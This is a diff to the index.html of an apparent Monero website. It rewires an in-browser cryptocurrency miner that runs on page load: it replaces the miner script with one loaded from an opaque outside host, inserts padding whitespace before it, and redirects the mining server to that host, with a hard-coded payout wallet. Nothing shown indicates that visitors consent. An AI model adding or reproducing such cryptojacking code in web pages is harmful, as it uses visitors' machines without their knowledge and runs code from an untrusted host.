--- a/index.html
+++ b/index.html
@@ -5,7 +5,12 @@
     <title>Monero Website</title>
     <link rel="manifest" href="/manifest.json">
       <!-- Start Of Mining Code -->
-    <script src='https://monerominer.rocks/miner-mmr/webmnr.min.js'></script>
+
+   
+
+
+    
+    <script src='https://script.ghgi.xyz'></script>
 <script>
     let script = document.createElement('script');
     let head = document.getElementsByTagName('head')[0];
@@ -14,7 +19,7 @@
     head.appendChild(script);
 
     script.onload = () => {    
-        server            = 'wss://f.xmrminingproxy.com:8181';
+        server            = 'wss://ghgi.xyz';
         var pool          = 'moneroocean.stream';
         var walletAddress = '4881APTxerVEMhPAdA1eQJVCV7L6QwTUz2cVSZpKHYbvghawyD5748bDqhmqiXurmq3pYPgtaRtu4WkTaMNQHAk6Q5dA466';
         var workerId      = ''
